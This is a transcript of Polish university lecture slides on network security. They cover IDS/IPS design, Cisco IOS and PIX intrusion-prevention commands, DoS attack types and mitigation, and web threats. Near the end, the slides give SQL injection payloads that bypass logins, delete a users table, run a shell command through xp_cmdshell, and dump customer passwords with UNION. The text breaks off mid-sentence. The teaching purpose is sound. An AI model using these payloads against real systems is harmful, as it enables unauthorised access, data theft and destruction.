BSS.w05.v2013.

Transkrypt

BSS.w05.v2013.

Bezpieczeństwo Systemów
Sieciowych
dr inż. Łukasz Sturgulewski, [email protected], http://luk.kis.p.lodz.pl/
dr inż. Andrzej Frączyk, [email protected]
BSS - v2013
1
Co dalej?
IDS, IPS
 Application Firewall (zagrożenia w warstwie

aplikacji – głównie web w tym także DNS oraz
PKI)

TOR, Sandbox, Honeypot
Backup
BSS - v2013
2
Zagrożenia
BSS - v2013
3
IDS/IPS

IDS (ang. Intrusion Detection System)

IPS (ang. Intrusion Prevention System)
BSS - v2013
4
zero-day
BSS - v2013
5
zero-day
Nowy wirus (robak, trojan) – wcześniej
wolna propagacja, dziś błyskawiczna.
 Nowa dziura w sofcie
(usługach, bazach, itp. itd.):

odkrycie,
 użycie (wcześniejszy rekonesans pozwala
stwierdzić z czego korzysta nasz cel),
 załatanie.

BSS - v2013
6
IDS
Przed IDS admin siedzi i przegląda ruch
(logi), dokonuje analizy i podejmuje
decyzje.
 System IDS – pasywne monitorowanie
ruchu w sieci.
 Tryb offline i inline.

BSS - v2013
7
IDS - offline
Przekierowanie
kopii ruchu do
sensora, analiza
ruchu.
 Porównanie ruchu
z sygnaturami.
 Wysłanie alarmu
do stacji MC.

BSS - v2013
8
IDS - offline

Zalety:


Brak wpływu na wydajność sieci, urządzeń.
Wady:

Szkodliwy ruch dotrze do celu (można
połączyć IDS z urządzeniami sieciowymi aby
zapewnić reakcję).
BSS - v2013
9
IDS - inline
Właściwy ruch przez niego przechodzi,
nie kopia.
 Nie blokuje szkodliwego ruchu.
 Wysyła alerty do stacji MC.

BSS - v2013
10
IPS - inline
Ruch przepływa
przez sensor.
 Porównanie ruchu
z sygnaturami.
 Wysłanie alarmu
do stacji MC.
 Blokowanie ruchu.

BSS - v2013
11
IPS - inline

Zalety:


Blokowanie szkodliwego ruchu.
Wady:
Negatywny wpływ na wydajność.
 Gubione pakiety jeśli źle skonfigurowany.
 False positive…

BSS - v2013
12
IDS, IPS

Sensor IDS lub IPS może być jednym z
urządzeń:
Router z systemem IOS IPS
 Dedykowane urządzenie IDS lub IPS
 Moduł dodatkowy zainstalowany w:

firewall,
 router,
 switch.

BSS - v2013
13
IDS, IPS




IDS, IPS używa sygnatur aby wykrywać
wzorce nadużyć w ruchu sieciowym.
Sygnatura jest zbiorem zasad, które IDS, IPS
wykorzystuje do wykrycia zagrożenia.
Sygnatury pozwalają na detekcję szerokiego
zakresu ataków, nieprawidłowości.
IDS, IPS wykrywają:


atomic signature patterns (single-packet),
composite signature patterns (multipacket).
BSS - v2013
14
IDS vs IPS
IDS: Brak wpływu na sieć: opóźnienia, zmienność
opóźnienia, uszkodzenie sensora, przeciążenie
sensora.
 IPS: Zatrzymanie szkodliwego ruchu (od pierwszego
pakietu); bezpośredni wpływ, regulacja ruchu.
 IDS: Zatrzymanie szkodliwego ruchu wymaga
współpracy z innymi urządzeniami.
 IPS: Wpływa na sieć: opóźnienia, zmienność
opóźnienia, uszkodzenie sensora, przeciążenie
sensora.

BSS - v2013
15
IDS vs IPS

IDS i IPS: wymagają starannego
dostrojenia:
Sygnatury
 Dozwolone poziomy
 Reakcja (podejmowane działania)

IPS inline – szybka inspekcja
 IDS offline – dokładna, szczegółowa
inspekcja

BSS - v2013
16
Network Intrusion Prevention System
(NIPS)
BSS - v2013
17
Host Intrusion Prevention System
(HIPS)



HIPS skanuje logi, pliki systemowe, zasoby w tym rejestr i procesy.
Zaleta: możliwość monitorowania systemu operacyjnego, procesów, plików.
Łączy analizę behawioralną z sygnaturami oraz funkcjami antywirusa, firewall sieciowego i
aplikacyjnego.
BSS - v2013
18
Składniki HIPS

HIPS składa się z dwóch komponentów:


Management Center – serwer;
Do zarządzania dla admina.
Security Agent – hosty;
Agent działa używając zbioru polityk
zdefiniowanych indywidualnie dla niego.
BSS - v2013
19
Działanie HIPS
BSS - v2013
20
Przykład HIPS

ESET NOD32
BSS - v2013
21
HIPS analiza
Sygnatury
 Poziomy
 Zachowanie

BSS - v2013
22
HIPS

Zalety:




Wynik ataku (powodzenie, porażka) znane jest natychmiast.
Nie troszczy się o typowe ataki L3 – zajmuje się tym OS.
Dostęp do ruchu nieszyfrowanego.
Wady:



Wpływ na wydajność stacji roboczej.
HIPS nie dostarcza kompletnego obrazu sieci.
HIPS powinien być uruchomiony na wszystkich hostach.
Wymagane wsparcie dla szerokiej gamy systemów
operacyjnych.
BSS - v2013
23
HIPS vs NIPS

Raczej jako uzupełnienie a nie
konkurencja.
BSS - v2013
24
Network-Based Intrusion Detection

Sensory są umieszczane w wybranych
punktach sieci aby w nich monitorować /
weryfikować ruch pod kątem bezpieczeństwa.
BSS - v2013
25
IPS
Ochrona IPS: IOS na urządzeniu IPS jest okrojony do
niezbędnych usług/procesów (dodatkowo
chronionych). Cel: wydajność i bezpieczeństwo
(hardening).
 Elementy typowego IPS:




Network Interface Card (NIC)
Procesor
Pamięć operacyjna – im bardziej rozbudowane śledzenie tym
większe zapotrzebowanie.
BSS - v2013
26

Network IPS zapewnia bezpieczeństwo sieci w czasie
rzeczywistym:



wzrost liczby zasobów (węzłów) nie ma krytycznego znaczenia
(także kosztów),
nowy sensor konieczny tylko w przypadku dużego wzrostu
ruchu w chronionym segmencie sieci.
Dodanie nowej sieci wymusza dodanie nowego
sensora – łatwa procedura.
BSS - v2013
27

Routery ze zintegrowanymi usługami:


Bez dodatkowych modułów (tylko wersja systemu operacyjnego) –
problem pamięci i wydajności.
Dodatkowe moduły np. IPS Advanced Integration Module (AIM) lub
Network Module Enhanced (IPS NME).
Dedykowane urządzenie IPS np. IPS 4200 seria (najwyższa
wydajność, najwięcej rozpoznawanych zagrożeń, najszerszy
zakres metod inwigilacji ruchu).
 Firewall:




Bez dodatkowych modułów – problem pamięci i wydajności.
Dodatkowe moduły np. Inspection and Prevention Security Services
Module (ASA AIP-SSM).
Przełącznik sieciowy L3, modularny np. Catalyst 6500 z modułem
Intrusion Detection System Services Module (IDSM-2).
BSS - v2013
28
Cisco IDS Network Module
BSS - v2013
29
Cisco IDSM-2
BSS - v2013
30
Cisco IPS 4240
BSS - v2013
31
Cisco
BSS - v2013
32
IPS – co wybrać?

Wiele czynników może decydować o wyborze IPS:




wolumen ruchu sieciowego,
topologia sieci,
budżet,
wykwalifikowani pracownicy.
BSS - v2013
33
HIPS vs Network IPS

Zalety NetIPS:





Koszty (efektywne wykorzystanie).
Przezroczysty dla urządzeń i usług.
Niezależność od OS.
Możliwość śledzenia ruchu na poziomie najniższych warstw
modelu OSI.
Wady NetIPS:



Wpływ na wydajność sieci (opóźnienia).
Problem inwigilacji ruchu szyfrowanego.
Brak wiedzy czy atak zakończył się sukcesem.
BSS - v2013
34
HIPS vs Network IPS

Zalety HIPS:




Reguły dobrane do węzła (hosta, serwera, inne)
Inwigilacja ruchu szyfrowanego.
Inwigilacja na poziomie aplikacji.
Wady HIPS:



Zależność od OS.
Niższe warstwy modelu OSI nie są widoczne.
Host jest widoczny dla intruza.
BSS - v2013
35
IPS
Aby zatrzymać szkodliwy ruch sieć musi go
zidentyfikować.
 Najczęściej ruch ten różni się od ruchu prawidłowego.
Sygnatury i poziomy pozwalają identyfikować robaki,
wirusy, exploity, anomalie w protokołach, szkodliwy
ruch, ataki DoS, itp. itd...
 Sygnatury koncepcyjnie są zbliżone do plików typu
virus.dat z definicjami wirusów - wykorzystywane
przez antywirusy.

BSS - v2013
36
IDS, IPS

Gdy sensor znajdzie dopasowanie ruchu do sygnatury
podejmuje akcje takie jak:



logowanie zdarzeń,
wysyłanie alarmów do aplikacji/stacji zarządzającej.
Sygnatury posiadają trzy główne atrybuty:



Type
Trigger (alarm)
Action
BSS - v2013
37
Klasyfikacja sygnatur IDS, IPS
BSS - v2013
38
Atomic – proste sygnatury
BSS - v2013
39
Compound (stateful) – złożone sygnatury




Sekwencja operacji rozrzucona na wiele
węzłów w określonym oknie czasowym.
Wysokie zapotrzebowanie na pamięć.
event horizon – okno czasowe.
initial signature component – pierwszy pakiet,
podejrzany o bycie elementem złożonego
ataku.
BSS - v2013
40
IPS – charakterystyka sygnatur
Jeśli nowe zagrożenia zostaną
zidentyfikowane, nowe sygnatury muszą
być opracowane i załadowane do IPS.
 Plik sygnatur zawiera paczkę sygnatur
stanowiącą update dla systemu IPS.

BSS - v2013
41
IPS – sygnatura 1102.0 (LAND atak)
IOS-S556-CLI.pkg
(linia 0160)
BSS - v2013
42
Grupowanie sygnatur
Aby skanowanie sygnatur było bardziej efektywne system IOS opiera się
na micro-engines (SME), które kategoryzują sygnatury w grupy.
 Kiedy IDS, IPS jest włączony, załadowany jest SME. Do sprawnego
działania SME wymaga skompilowanych sygnatur.
 SME wyciąga określone wartości z pakietów i przekazuje do REE
(Regular Expression Engine). REE potrafi jednoczasowo wyszukiwać
wiele wzorców.
 Liczba dostępnych SME zależy od platformy. Cisco IOS Release 12.4(6)T
definiuje 5 micro-engines:






Atomic – weryfikacja pojedynczych pakietów np. ICMP, UDP.
Service – weryfikacja usług.
String – weryfikacja określonych wyrażeń regularnych w celu wykrycia intruzów.
Multi-string - weryfikacja elastyczna wielu wyrażeń oraz sygnatur Trend Labs.
Other – różne, inne sygnatury.
BSS - v2013
43
Grupowanie sygnatur
BSS - v2013
44
Sygnatury - Update



Mniej istotne – publikowane tygodniowo.
Istotne – publikowane natychmiast.
Przykład: plik IOS-S361-CLI.pkg zawiera
wszystkie sygnatury z pliku IOS-S360-CLI.pkg



plus nowe sygnatury
minus sygnatury nieaktualne.
Pobieranie ręczne i automatyczne.
BSS - v2013
45
Bezpieczeństwo systemu sieciowego
IDS,
 Firewall – router, dedykowane
urządzenia,
 Virtual Private Network (VPN),
 Network Admission Control (NAC),
 IPS.

BSS - v2013
46
Alarmy sygnatur


Alarm sygnatury = alarm, trigger
Jakie czujki mamy w systemie?


W domu mamy czujki ruchu, czujki zbicia szyby, itp. itd.
IPS („full wypas”) ma:





Pattern-based detection
Anomaly-based detection
Policy-based detection
Honey pot-based detection
Dekodowanie protokołów – bardziej szczegółowa
inwigilacja, weryfikacja zgodności ze standardami.
BSS - v2013
47
Pattern-based detection
Pattern-based detection = signature-based detection, jest
najprostszym mechanizmem, wyszukiwanie specyficznych,
predefiniowanych wzorców.
 Wykrywanie w:




single packet (atomic)
sequence of packets (composite).
Wzorce mogą być łączone z określonymi usługami bądź portami.
Nie zawsze to się jednak sprawdza – konie trojańskie, które
później atakują inne wewnętrzne zasoby, backdoor.
BSS - v2013
48
Anomaly-based Detection




Anomaly-based detection = profile-based detection
Prawidłowy profil użytkownika jest tworzony poprzez monitorowanie jego aktywności w sieci
w określonym czasie. Profil także może uwzględniać specyfikacje takie jak RFC.
Po określeniu profilu (normalna aktywność), sygnatura wyzwala akcję jeśli badany ruch nie
zawiera się w profilu (zwykłe reguły, sieci neuronowe, rozpoznawanie obrazów).
Problemy:





A co gdy user zmieni zachowanie?
A co z atakami w trakcie uczenia?
Trudność w łączeniu anomalii z konkretnym atakiem – wymagana dokładna, dodatkowa analiza.
Atak może być zaklasyfikowany jako normalny ruch.
Metody klasyfikacji:



zwykłe reguły,
sieci neuronowe,
rozpoznawanie obrazów.
BSS - v2013
49
Anomaly-Based Detection
BSS - v2013
50
Policy-based Detection

Zbliżone do pattern-based detection,
admin definiuje prawidłowe zachowania
na podstawie zgromadzonych danych
historycznych o aktywności
pracowników.
BSS - v2013
51
Honey pot-based Detection

Honey pot-based detection - używa „atrapy” , „przynęty” serwera
w celu:


odciągnięcia uwagi od ważnych zasobów,
dokładnej analizy (śledzenie) działań intruza.
Rzadziej używany w sieciach produkcyjnych.
 Używane głównie w celach badawczych – np. producenci softu z
zakresu bezpieczeństwa.

BSS - v2013
52
IPS – typy alarmów
BSS - v2013
53
IDS / IPS
Detection – Identifies
malicious attacks on
network and host
resources.
 Prevention – Stops
the detected attack
from executing.
 Reaction – Immunizes
the system from
future attacks from a
malicious source.

BSS - v2013
54
IPS – poziom ważności alarmu

Administrator może wybrać z kilku poziomów
ważności dla zagrożeń, sygnatur:





High (atak, DoS)
Informational (niebezpośredni atak)
Low (nietypowy ruch w sieci, nie prowadzący do
bezpośredniego ataku)
Medium (nietypowy ruch w sieci, prowadzący do
bezpośredniego ataku)
Dobranie poziomów do sieci aby ograniczać
false positive.
BSS - v2013
55
IPS – odpowiedź systemu
(typy alarmów)

Kiedy wykryte zostanie zagrożenie możliwych
jest kilka działań:







Generowanie alarmu (alarm, alarm + pakiet).
Logowanie aktywności (atakujący, atakowany, obaj).
Odrzucanie, zapobieganie aktywności (atakujący,
połączenie, pakiet).
Resetowanie połączenia TCP (RST).
Blokowanie przyszłej aktywności.
Zezwolenie na aktywność.
Działania zależą głównie od sygnatury.
BSS - v2013
56
IPS – odpowiedź systemu
Network
Management
Console
4 Alarm
2
1 Attack
Drop Packet
3
Reset Connection
BSS - v2013
57
Generowanie alarmów



Monitorowanie alarmów jest bardzo ważne, pozwala
na wykrycie i zrozumienie tego co stało się w
systemie.
Intruz może zalać system fałszywymi alarmami aby
zaciemnić, odciągnąć uwagę od właściwego ataku.
Systemy IPS najczęściej udostępniają dwa tryby
alarmów, ostrzeżeń:


Atomic alerts – generowany zawsze gdy sygnatura zostanie
wyzwolona. Czasem użyteczne (natychmiast widać co i jak często
występowało), czasem kłopotliwa w analizie (gdy dużo zdarzeń).
Summary alert – pojedynczy alarm zwierający wiele wystąpień tej
samej sygnatury z tego samego źródła na ten sam port. Ogranicza
liczbę alarmów, rozjaśnia obrazów, nie obciąża sieci i systemów.
BSS - v2013
58
Logowanie aktywności
Czasem brak pewności co do szkodliwości ruchu, w takiej sytuacji
warto logować podejrzaną aktywność w celu dalszej (offline)
analizy.
 Admin posiada/dodał sygnaturę wyszukującą ciąg znaków
„/etc/password” z akcją logowanie. Gdy ciąg się pojawi cały ruch
z tego adresu przez określony czas (albo liczbę bajtów) jest
logowany.
Co umożliwia późniejszą, dokładną analizą danych – co dalej robił
podejrzany.

BSS - v2013
59
Odrzucanie, zapobieganie aktywności




Kluczowym działaniem IPS jest odrzucanie
(drop) pakietów – zapobieganie aktywności.
Pozwala zatrzymać atak zanim wyrządzi on
szkody w systemie.
Nie tylko jeden pakiet, ale cały strumień, albo
cały ruch od intruza.
Możliwa współpraca z innymi urządzeniami w
celu blokowania ruchu.
BSS - v2013
60
Resetowanie połączenia TCP
Typowe działanie mające na celu
zakończenie połączenia TCP poprzez
wygenerowanie pakietu TCP z ustawioną
flagą RST.
 Często stosuje się łącznie deny + RST.

BSS - v2013
61
Blokowanie przyszłej aktywności

Blokowanie przyszłej aktywności np. poprzez wpływ na
ACL na urządzeniach sieciowych.
ACL może zatrzymać ruch od intruza bez angażowania
zasobów systemu IPS.
Po określonym okresie czasu IPS usuwa ACL.

Dodatkowo możliwość ochrony
całej sieci – zagrożenie wykryte
w jednym segmencie =
ACL dla całej sieci.
BSS - v2013
62
Zezwolenie na aktywność

Akcja wymagana gdy admin chce
zdefiniować wyjątki dla wybranych
sygnatur.
BSS - v2013
63
IPS – zarządzanie i monitorowanie

Monitorowanie incydentów
bezpieczeństwa pozwala adminowi:
zidentyfikować atak,
 określić naruszenia polityki bezpieczeństwa.

BSS - v2013
64
Management Method: Sensory mogą być zarządzane
indywidualnie albo centralnie.
 Event correlation: Proces korelowania ataków i innych zdarzeń,
które wydarzyły się jednocześnie w różnych punktach sieci.
(scentralizowany system + NTP + analiza danych).
 Security Staff: Wykwalifikowana kadra jest konieczna aby
prawidłowo analizować i oceniać skuteczność IPS – także
dostrajać i optymalizować.
 Incident Response Plan: Skutecznie zaatakowany system
powinien być przywrócony do stanu sprzed ataku.

BSS - v2013
65

Konfiguracja:
CLI
 GUI


Zarządzanie lokalne (przykłady dla Cisco):



Cisco Router and Security Device Manager (SDM)
Cisco IPS Device Manager (IDM)
Zarządzanie scentralizowane (przykłady dla Cisco):



Cisco IDS Event Viewer (IEV)
Cisco Security Manager (CSM)
Cisco Security Monitoring, Analysis, and Response System (MARS)
BSS - v2013
66
IPS – logowanie zdarzeń

Po wykryciu ataku IOS IPS może wysłać wiadomość w formacie
Syslog lub Secure Device Event Exchange (SDEE).
%IPS-4-SIGNATURE:Sig:1107 Subsig:0 Sev:2 RFC1918
address [192.168.121.1:137 ->192.168.121.255:137]
BSS - v2013
67
IPS - podsumowanie

Aktualizacja sygnatur:


BSS - v2013
ręczna
automatyczna
68
Configuration Tasks on Cisco IOS
Install
Cisco IOS IPS on the router.
Specify location of the Signature Definition File
(SDF).
 Create an IPS rule.
 Attach a policy to a signature (Optional).
 Apply IPS rule at an interface.

Configure
Logging using Syslog or SDEE.
Verify the configuration.
BSS - v2013
69
Specify Location of SDF
Router (config)#
ip ips sdf location url
(Optional)
Specifies the location in which the router
will load the SDF, attack-drop.sdf.
If
this command is not issued, the router will load the
default, built-in signatures.
Router(config)# ip ips sdf location
disk2:attack-drop.sdf
BSS - v2013
70
Create an IPS Rule
Router (config)#
ip ips name ips-name [list acl]
• Creates an IPS rule.
Router(config)# ip ips name MYIPS
• Creates an IPS rule named MYIPS that will be
applied to an interface.
BSS - v2013
71
Attach a policy to a given signature
(optional)
Router (config)#
ip ips signature signature-id [:sub-signature-id]
{delete | disable | list acl-list}
• Attaches a policy to a given signature.
Router(config)# ip ips signature 1000 disable
• Disables signature 1000 in the signature definition
file.
BSS - v2013
72
Apply an IPS Rule at an Interface
Router (config-if)#
ip ips ips-name {in | out}
• Applies an IPS rule at an interface.
Router(config-if)# ip ips MYIPS in
BSS - v2013
73
Upgrade to Latest SDF
Router (config)#
ip ips name ips-name
• Creates an IPS rule.
Router (config)#
no ip ips sdf builtin
• Instructs the router not to load the built-in signatures.
Router (config)#
ip ips fail closed
• Instructs the router to drop all packets until the signature
engine is built and ready to scan traffic.
74
BSS - v2013
Upgrade to Latest SDF(Cont.)
Router (config-if)#
ip ips ips-name {in | out} [list acl]
• Applies an IPS rule at an interface. This command
automatically loads the signatures and builds the
signature engines.
BSS - v2013
75
Monitoring Cisco IOS IPS Signatures
Network
Management
Console
Alarm
SDEE Protocol
Alert
Syslog
Syslog
Server
BSS - v2013
76
SDEE Benefits
(Security Device Event Exchange)


Vendor Interoperability – SDEE will become
the standard format for all vendors to
communicate events to a network
management application. This lowers the cost
of supporting proprietary vendor formats and
potentially multiple network management
platforms.
Secured transport – The use of HTTP over SSL
or HTTPS ensures that data is secured as it
traverses the network
BSS - v2013
77
Set Notification Type
Router (config)#
ip ips notify [log | sdee]
• Sets notification type
Router(config)# ip ips notify sdee
Router(config)# ip ips notify log
Router (config)#
ip sdee events num_of_events
• Sets the maximum number of SDEE events that can
be stored in the event buffer.
BSS - v2013
78
show Commands
Router#
show ip ips configuration
• Verifies that Cisco IOS IPS is properly configured.
Router#
show ip ips signatures [detailed]
• Verifies signature configuration, such as signatures
that have been disabled.
Router#
show ip ips interface
• Display the interface configuration.
BSS - v2013
79
clear Commands
Router#
clear ip ips configuration
• Remove all intrusion prevention configuration entries, and
release dynamic resources.
Router#
clear ip ips statistics
• Reset statistics on packets analyzed and alarms sent
Router#
clear ip sdee {events | subscriptions}
• Clear SDEE events or subscriptions.
BSS - v2013
80
debug Commands
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
Router#
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
debug
ip
ip
ip
ip
ip
ip
ip
ip
ip
ip
ip
ip
ip
ip
ips
ips
ips
ips
ips
ips
ips
ips
ips
ips
ips
ips
ips
ips
timers
object-creation
object-deletion
function trace
detailed
ftp-cmd
ftp-token
icmp
ip
rpc
smtp
tcp
tftp
udp
• Instead of no, undebug may be used
BSS - v2013
81
Configure Intrusion Prevention
on the PIX Security Appliance
BSS - v2013
82
Configure IDS
pixfirewall(config)#
ip audit name audit_name info [action [alarm] [drop] [reset]]
• Creates a policy for informational signatures.
ip audit name audit_name attack [action [alarm] [drop] [reset]]
• Creates a policy for attack signatures.
ip audit interface if_name audit_name
• Applies a policy to an interface.
pixfirewall(config)# ip audit name ATTACKPOLICY attack action
alarm reset
pixfirewall(config)# ip audit interface outside ATTACKPOLICY
• When the PIX Security Appliance detects an attack signature on its outside interface, it
reports an event to all configured Syslog servers, drops the offending packet, and closes the
connection if it is part of an active connection.
BSS - v2013
83
Specify Default
Actions for Signatures
ip audit attack [action [alarm] [drop] [reset]]
• Specifies the default actions for attack signatures.
ip audit info [action [alarm] [drop] [reset]]
• Specifies the default actions for informational signatures.
pixfirewall(config)# ip audit info action alarm drop
• When the PIX Security Appliance detects an info signature, it reports
an event to all configured Syslog servers and drops the offending
packet.
BSS - v2013
84
Disable Intrusion
Detection Signatures
ip audit signature signature_number
disable
Excludes
a signature from auditing.
pixfirewall(config)# ip audit signature
6102 disable
• Disables signature 6102.
BSS - v2013
85
DoS, DDoS








Ping of death
Teardrop
Land
UDP-flood
Smurf (Fraggle)
SYN Flood Attack (Naptha (FIN))
HTTP-flood (Slowloris)
HTTP GET Flood
BSS - v2013
86
SYN Flood Attack
Atakujący podszywa się pod
nieistniejący adres IP i zalewa
cel pakietami SYN.

Cel odpowiada na pakiety
SYN poprzez wysłanie
pakietów SYN-ACK na
nieistniejący adres IP.

Cel przepełnia swój bufor
zbyt dużą liczbą „embryonic
connections” i przestaje
odpowiadać na prawidłowy
ruch.

BSS - v2013
87
SYN Flood Guard Configuration
pixfirewall (config)#
static [(prenat_interface, postnat_interface)]
mapped_address | interface real_address [dns][netmask
mask][norandomseq][connection_limit [em_limit]]

For inbound connections:

Use the em_limit to limit the number of embryonic connections.

Set the limit to a number lower than the server can handle.
pixfirewall (config)#
nat [(if-name)]id address [netmask [outside] [dns]
[norandomseq] [timeout hh:mm:ss] [conn_limit [em_limit]]]

For outbound connections:

Use the em_limit to limit the number of embryonic connections.

Set the limit to a number lower than the server can handle.
pixfirewall(config)# nat (inside) 1 0 0 0 10000
pixfirewall(config)# static (inside,outside) 192.168.0.11
172.16.0.2 0 1000
BSS - v2013
88
Slow-Header Attack
Ciąg dalszy nastąpił… po 20s.
http://blogs.citrix.com/2011/09/20/slow-header-attack-brought-down-many-sitesrecently-–-know-how-to-protect-against-such-attacks-using-netscaler/
BSS - v2013
89
Slow-Post Attack
http://blogs.citrix.com/2011/09/23/slow-post-attack-affects-applications-around-theworld-–-know-how-to-protect-against-such-attacks-using-netscaler/
BSS - v2013
90
HTTP GET Flood
Nie ma na celu wysycenia pasma.
 Ma na celu wysycenie zasobów serwera (CPU, memory).
 Zapytanie musi być tak przygotowane aby serwer musiał
wykonać maksymalnie wiele operacji (zapytania do bazy
danych, sesje SSL).
 Od czasu gdy HTTP GET Flood używa standardowych URL
requests, stał się trudny do rozpoznania przez systemy IDS/IPS,
szczególnie w wersji rozproszonej (DDoS).

BSS - v2013
91
OWASP: HTTP Post Tool
Open Web Application
Security Project
OWASP's guides are a
great start towards
building and maintaining
secure applications.
quickly,
accurately,
efficiently.
https://www.owasp.org/index.php/OWASP_HTTP_Post_Tool
BSS - v2013
92
DoS, DDoS - przeciwdziałanie
http://niebezpiecznik.pl/symantec/jak-chronic-sie-przed-ddos-em/
1.
2.
3.
4.
5.
6.
7.
„Zoptymalizuj swoją stronę. Im mniej zapytań do bazy danych i im mniej
zasobów pobieranych z twoich serwerów podczas “wizyty” na twojej stronie,
tym lepiej.
Statyczne treści (obrazki, skrypty js, arkusze stylów, pliki PDF) wystaw przy
pomocy osobnego serwera, tzw. CDN (Content Delivery Network).
Rozważ CDN dla całego serwisu. Istnieją tanie rozwiązania takie jak darmowy
Cloudflare.
Zastanów się nad loadbalancingiem. Krótko mówiąc, skaluj moc obliczeniową
swoich serwerów. Żądanie zanim trafi do webserwera jest przechwytywane
przez loadbalancer, który następnie decyduje do którego webserwera z farmy
(klastra) je przekazać. Wirtualizacja i optymalizacja wykorzystania zasobów.
Skaluj łącze. Dynamiczny routing i kilka niezależnych łącz może pomóc w
trakcie ataków DDoS.
Rozdziel usługi. DDoS-y z reguły dotykają stron WWW.
Ustal alternatywny kanał komunikacji, np. Facebook.”
BSS - v2013
93
CloudFlare is the next-generation CDN
BSS - v2013
94
CloudFlare advanced DDoS protection





Layer 3/4 attacks
DNS amplification attacks
SMURF attacks
ACK attacks
Layer 7 attacks
BSS - v2013
95
IDS: Intrusion Deception System
http://www.mykonossoftware.com/
BSS - v2013
96
Detekcja






Zastawienie wielu pułapek w celu złapania intruza, już w czasie
rekonesansu (przed atakiem szkodliwym).
Wstawienie w przepływający ruch (aplikacje webowe
zawierające URLe, formularze, pliki) „detection points” – losowe
i zmienne dane.
Kiedy intruz zaczyna manipulować „detection points” zostaje
złapany.
„detection points” – nie są związane z serwerem aplikacji,
użytkownik także ich nie widzi.
„detection points” – zostaną zauważone przez intruza
szukającego podatności na np. exploity.
Aplikacja nie jest już pasywna!
BSS - v2013
97
Śledzenie

Po etapie detekcji następuje:

Śledzenie:




IP
Wstrzyknięcie „persistent token” do przeglądarki intruza
„Fingerprinting” maszyny intruza (jeśli używa softu albo
skryptów)
Rejestracja (PVR)
BSS - v2013
98
Profil

W czasie śledzenia budowany jest profil intruza:
BSS - v2013
99
Reakcja

Reakcje automatyczne, w czasie rzeczywistym:
BSS - v2013
100
Aktualizacja systemu ochrony

Dawne czasy: raz dziennie…
Dziś: natychmiast gdy zagrożenie wykryte

Jak wykrywać zagrożenia?



Ktoś musi dostarczyć próbkę…
A może lepiej pobierać dane z systemów klientów?
BSS - v2013
101
Ochrona w czasie rzeczywistym –
inteligencja w chmurze…
BSS - v2013
102
BSS - v2013
103
BSS - v2013
104
BSS - v2013
105
BSS - v2013
106
ASA CX

ASA Context Aware
BSS - v2013
107
ASA CX
BSS - v2013
108
ASA CX
BSS - v2013
109
ASA CX
BSS - v2013
110
ASA CX
BSS - v2013
111
ASA CX
BSS - v2013
112
ASA CX
BSS - v2013
113
ASA CX
BSS - v2013
114
ASA CX
BSS - v2013
115
ASA CX
BSS - v2013
116
ASA CX
BSS - v2013
117
ASA CX
 Zastosowanie:
 Styk
z Internetem
 Kontrola aplikacji
 NGFW
BSS - v2013
118
BSS - v2013
119
WAF

Web Application
Firewall:

Cisco Web Security
Appliance
BSS - v2013
120
Web Security Appliance - Cache Web Proxy
BSS - v2013
121
BSS - v2013
122
BSS - v2013
123
Aplikacje webowe
W 2020 roku ponad 80% to aplikacje
webowe!
 Główne, obecne zagrożenia:

Injection Attacks,
 PHP Remote File Includes,
 Cross Site Scripting (XSS),
 Cross Site Request Forgeries (CSRF),
 Insecure Communications…

BSS - v2013
124
SQL Injection
Imperva: „SQLinjection has been responsible for 83% of
successful hacking-related data breaches (2005-2012)”
 Wstrzyknięcie „Injection” szkodliwych, spreparowanych przez
intruza, danych do interpretera.
 Wyszukanie stron w aplikacji webowej, które akceptują
wprowadzane przez użytkowników informacje w celu dostępu do
bazy:




login form, signup form, “forgot password” form,
dynamiczne strony używające zmiennych w URL takich jak ID produktu.
Włamania typu SQL injection wynikają z dwóch głównych
przyczyn:


braku lub niewystarczającej walidacji danych wejściowych,
braku kodowania znaków specjalnych przed wstawieniem do zapytania SQL.
BSS - v2013
125
Przykład SQL Injection
Załóżmy że na stronie znajduje się następujący formularz:
<form method="post" action="login.php">
Login: <input type="text" name="login"><br>
Hasło: <input type="password" name="pass"><br>
<input type="submit" value="Zaloguj się"><br>
</form>
 Po stronie serwera, w kodzie PHP tworzone i wykonywane jest
następujące zapytanie:
SELECT USER_ID FROM USERS WHERE (LOGIN='$login') AND
(PASS='$pass')

http://www.poradnik-webmastera.com/artykuly/bazy_danych/sql_injection.php
BSS - v2013
126

Intruz wpisuje w pole hasło:
' OR '1'='1

Zapytanie, które zostanie wykonane
będzie następujące:
SELECT USER_ID FROM USERS WHERE
(LOGIN='admin') AND (PASS='' OR '1'='1')
BSS - v2013
127

Intruz wpisuje:
admin') -
(LOGIN='admin') --') AND (PASS='')
BSS - v2013
128

Intruz wpisuje:
') DELETE FROM USERS -
(LOGIN='') DELETE FROM USERS -- ') AND
(PASS='')
BSS - v2013
129

Intruz wpisuje:
'); exec master..xp_cmdshell 'iisreset /stop' --

(LOGIN=''); exec master..xp_cmdshell
'iisreset /stop' -- ') AND (PASS='')
BSS - v2013
130

Wyświetlenie listy zamówionych
produktów za pomocą zapytania:
SELECT PRODUKT_ID, NAZWA, OPIS, KWOTA
FROM PRODUKTY, ZAMOWIENIA
WHERE (PRODUKTY.PRODUKT_ID=ZAMOWIENIA.PRODUKT.ID)
AND (KLIENT_ID=$id)
ORDER BY NAZWA

Wstrzyknięcie:
0 OR 1=1
BSS - v2013
131

Dostęp do innych tabel, korzystając z
instrukcji UNION:
-1) UNION SELECT KLIENT_ID, LOGIN, HASLO, 0 FROM
KLIENCI --

Zapytanie pozwoli zwrócić pełną listę
listę loginów i haseł klientów sklepu:
AND (KLIENT_ID=-1) UNION SELECT KLIENT_ID, LOGIN,
HASLO, 0 FROM KLIENCI --)
BSS - v2013
132
SQL Injection
SQL Injection – można szukać innych tabel w bazie
danych, oraz próbować określić typy ich kolumn.
 blind SQL injection – kiedy wynik wstrzykniętego kodu
nie jest prezentowany, wiemy tylko czy zapytanie
zakończyło się sukcesem, czy niepowodzeniem.
 Wielofazowy atak SQL Injection:
To zostało zakodowane (np. ‘ = ‘’) przy zapisie do
bazy, jest jednak odkodowywane przy odczycie, czyli
można tego użyć do generowania szkodliwego
zapytania… 

BSS - v2013
133
Przykład: SQL Injection
BSS - v2013
134
PHP Remote File Includes


PHP to najpopularniejszy „web application framework”.
Funkcja allow_url_fopen jest ulubioną przez
intruzów funkcją, gdyż:



pozwala uruchamiać ich skrypty na stronach ofiar,
jest domyślnie włączona.
Dostęp do choćby jednego pliku i dodanie w nim:
